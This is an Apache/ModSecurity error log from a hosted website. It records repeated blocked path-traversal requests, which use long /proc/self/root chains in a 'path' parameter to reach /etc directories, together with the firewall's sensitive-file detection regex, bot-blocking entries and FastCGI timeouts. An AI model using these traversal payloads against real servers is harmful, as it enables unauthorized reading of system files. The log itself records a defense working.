[Thu Mar 19 13:02:17.727873 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:44416] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abweCfu8EFLIOrSqIpu4fAAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 13:02:26.307601 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.244.43:50608] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abweEgkwaGbbGflqUZDXhAAAAM0"]
[Thu Mar 19 13:02:36.125807 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:43100] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:03:07.129815 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:43954] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:03:33.992611 2026] [:error] [pid 27293:tid 140411582465792] [client 74.7.243.128:40784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abweVf-YZRR_7pZ7nDKcBgAAA9M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:03:37.149817 2026] [proxy_fcgi:error] [pid 14269:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44828] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:03:54.288078 2026] [:error] [pid 19093:tid 140411632822016] [client 74.7.243.128:40790] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abweal_V7PWP6ixUYl7NkAAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 13:04:02.205781 2026] [proxy_fcgi:error] [pid 14269:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:45540] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:04:25.149878 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:46250] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:04:40.639986 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:45724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwemOyqAr6etmhZHNpw5wAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 13:04:47.129795 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:46858] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:05:14.129823 2026] [proxy_fcgi:error] [pid 14269:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:47690] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:05:36.144278 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:48372] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:05:57.129798 2026] [proxy_fcgi:error] [pid 15826:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:48968] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:06:17.204308 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.228.61:43092] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwe-eyqAr6etmhZHNpxCAAAAFc"]
[Thu Mar 19 13:06:17.228436 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:54498] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwe-eoXxyEfFpUF8f8eMQAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Thu Mar 19 13:06:19.125849 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:49614] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:06:42.124591 2026] [proxy_fcgi:error] [pid 17887:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50262] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:06:56.576372 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:54458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwfIOyqAr6etmhZHNpxLgAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 13:06:58.508873 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:36964] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwfIuoXxyEfFpUF8f8ePwAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Thu Mar 19 13:07:01.263082 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:60590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwfJQkwaGbbGflqUZDYWgAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 13:07:08.080667 2026] [proxy_fcgi:error] [pid 31803:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:51008] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:07:19.925491 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:60594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwfN8df6f5d65gmYZSJPQAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 13:07:24.386331 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:45420] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwfPAkwaGbbGflqUZDYgAAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 13:07:28.105846 2026] [:error] [pid 27293:tid 140411716749056] [client 74.7.244.43:46712] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwfQP-YZRR_7pZ7nDKckAAAA8M"]
[Thu Mar 19 13:07:30.133942 2026] [proxy_fcgi:error] [pid 19093:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:51680] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:07:43.464316 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.243.128:45436] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwfTxkFeYa1D6dYQnACfAAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:07:52.041849 2026] [proxy_fcgi:error] [pid 19093:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:52436] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:08:14.101856 2026] [proxy_fcgi:error] [pid 31803:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53092] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:08:39.049839 2026] [proxy_fcgi:error] [pid 30077:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:53644] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:09:05.129848 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:54280] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:09:35.129818 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:55036] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:10:00.149822 2026] [proxy_fcgi:error] [pid 17653:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55764] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:10:25.133784 2026] [proxy_fcgi:error] [pid 27403:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:56444] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:10:53.478344 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:57026] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:11:16.069856 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:57598] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:11:21.818415 2026] [:error] [pid 19093:tid 140411716749056] [client 74.7.228.61:40986] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwgKV_V7PWP6ixUYl7ORQAAAoM"]
[Thu Mar 19 13:11:22.745049 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:43376] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwgKsdf6f5d65gmYZSKcQAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:11:39.054111 2026] [proxy_fcgi:error] [pid 27293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58190] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:12:02.181807 2026] [proxy_fcgi:error] [pid 31803:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:58814] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:12:09.723478 2026] [:error] [pid 27293:tid 140411741927168] [client 74.7.243.128:35398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwgWf-YZRR_7pZ7nDKdOAAAA8A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 13:12:24.125846 2026] [proxy_fcgi:error] [pid 17887:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:59388] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:12:29.595243 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.244.43:39946] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwgbfu8EFLIOrSqIpu5ywAAAkY"]
[Thu Mar 19 13:12:47.145786 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:60052] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:13:09.145846 2026] [proxy_fcgi:error] [pid 17653:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:60632] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:13:32.129804 2026] [proxy_fcgi:error] [pid 27293:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33002] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:13:56.121775 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:33592] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:14:18.135104 2026] [proxy_fcgi:error] [pid 31803:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:34100] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:14:40.133792 2026] [proxy_fcgi:error] [pid 26799:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34618] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:15:04.151162 2026] [proxy_fcgi:error] [pid 30077:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35154] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:15:32.097951 2026] [proxy_fcgi:error] [pid 27293:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:35826] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:15:57.153885 2026] [proxy_fcgi:error] [pid 19093:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:36448] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:16:24.125859 2026] [proxy_fcgi:error] [pid 14269:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37026] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:16:27.936575 2026] [:error] [pid 19093:tid 140411725141760] [client 74.7.228.61:45648] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwhW1_V7PWP6ixUYl7OygAAAoI"]
[Thu Mar 19 13:16:48.134264 2026] [proxy_fcgi:error] [pid 31803:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:37636] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:17:11.235272 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:33510] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwhh8df6f5d65gmYZSLcAAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:17:12.119661 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38168] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:17:31.802455 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.244.43:60466] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwhm-oXxyEfFpUF8f8fZwAAAU8"]
[Thu Mar 19 13:17:35.033886 2026] [proxy_fcgi:error] [pid 14269:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:38740] AH01075: Error dispatching request to : (polling)
